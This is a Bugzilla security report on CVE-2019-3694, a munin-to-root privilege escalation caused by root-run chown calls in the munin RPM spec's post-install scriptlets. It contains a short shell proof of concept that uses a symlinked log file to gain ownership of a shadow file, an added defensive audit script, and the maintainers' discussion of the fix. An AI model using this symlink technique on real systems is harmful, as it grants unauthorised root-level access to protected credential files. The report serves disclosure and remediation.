Bugzilla – Bug 1155078
VUL-0: CVE-2019-3694: munin: LPE from munin to root
Last modified: 2024-06-13 15:15:05 UTC
    %post
    chown -R munin:munin %{htmldir}
    chown -R munin:munin %{dbdir}
    chmod 755 %{dbdir}
    touch %{logdir}/munin-graph.log %{logdir}/munin-html.log %{logdir}/munin-nagios.log %{logdir}/munin-limits.log %{logdir}/munin-update.log
    chown munin:munin %{logdir}/*

allows LPE from munin to root.

POC:

    sh-5.0$ id
    uid=463(munin) gid=462(munin) groups=462(munin)
    sh-5.0$ pwd
    /var/log/munin
    sh-5.0$ rm munin-graph.log
    sh-5.0$ ln -s /test/shadow munin-graph.log
    sh-5.0$ ls -l
    total 0
    lrwxrwxrwx 1 munin munin 12 Oct 25 11:13 munin-graph.log -> /test/shadow
    -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-html.log
    -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-limits.log
    -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-nagios.log
    -rw-r--r-- 1 root root 0 Oct 25 11:12 munin-node.log
    -rw-r--r-- 1 munin munin 0 Oct 25 11:12 munin-update.log
    sh-5.0$ ls -l /test/
    total 4
    -r-------- 1 root root 1228 Oct 25 11:01 shadow

force reinstall of munin

    sh-5.0$ ls -l /test/
    total 4
    -r-------- 1 munin munin 1228 Oct 25 11:13 shadow

The recursive chown calls can be exploited in a similar way with hardlinks on systems that have fs.protected_hardlinks=0.
Please use CVE-2019-3694 to track this. We can make this bug public at any time.
Similar issues in %post node:

    %post node
    if [ $1 = 1 ]; then
      /usr/sbin/munin-node-configure --shell | sh
    fi
    chown -R munin:munin %{dbdir}
    chmod 755 %{dbdir}
    touch %{logdir}/munin-node.log
    chown munin:munin %{logdir}/*
    chown root:root %{logdir}/munin-node.log*
    chown -R nobody:nobody %{dbdir}/plugin-state/* >/dev/null 2>&1
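An added example, not part of the original report or the munin package: a shell audit that lists symlinks and multiply-linked files under a service-writable directory such as %{logdir} or %{dbdir}, which are the entries through which the root-run chown calls in %post and %post node above get redirected. The function names and the sample directory layout are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the munin package or its spec file.
# Lists entries under a service-writable directory that a root-run
# "chown user:group DIR/*" or "chown -R" could be redirected through.
# Detection aid only: checking and then chowning would still be racy.

# audit_chown_targets DIR
# Prints "symlink PATH" or "hardlink PATH" per risky entry, sorted.
# Returns 0 when clean, 1 when something was found, 2 on a bad argument.
audit_chown_targets() {
    dir=$1
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
    # find does not follow symlinks by default, so planted links are
    # reported instead of traversed.
    report=$(
        find "$dir" -type l -print | sed 's/^/symlink /'
        find "$dir" -type f -links +1 -print | sed 's/^/hardlink /'
    )
    [ -n "$report" ] || return 0
    printf '%s\n' "$report" | sort
    return 1
}

# make_sample_logdir ROOT
# Constructed sample: a log directory shaped like the one in the report,
# with one log replaced by a symlink and one hard-linked to an outside file.
make_sample_logdir() {
    root=$1
    mkdir -p "$root/log" "$root/other"
    : > "$root/other/shadow"
    : > "$root/other/config"
    : > "$root/log/munin-html.log"
    : > "$root/log/munin-update.log"
    ln -s "$root/other/shadow" "$root/log/munin-graph.log"
    ln "$root/other/config" "$root/log/munin-limits.log"
}

# Stand-alone use: audit the directory given as the first argument.
if [ -n "${1:-}" ]; then
    audit_chown_targets "$1"
fi
```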
Can you please have a look? We want to make these issues public in the near future. Thank you
Please submit for this
ping, please have a look
Do you have hints what the correct solution is?
(In reply to Wolfgang Rosenauer from comment #6) So the easiest solution would be to remove these snippets and have rpm create the files with proper permissions. For the log files that might be tricky, since you don't want to overwrite them upon update. Doesn't munin create them if they're missing? If not, you can use runuser to touch them as munin directly; that's safe.
Can you please submit for this? Feel free to reach out if you have questions.
This has been open for a really long time. Can you please work on this? Otherwise I'll file a drop request next week
There are new maintainers. @Wolfgang: Do you want to reassign this bug to them?
Script was dropped, thanks.
This is an autogenerated message for OBS integration: This bug (1155078) was mentioned in https://build.opensuse.org/request/show/1180707 Factory / munin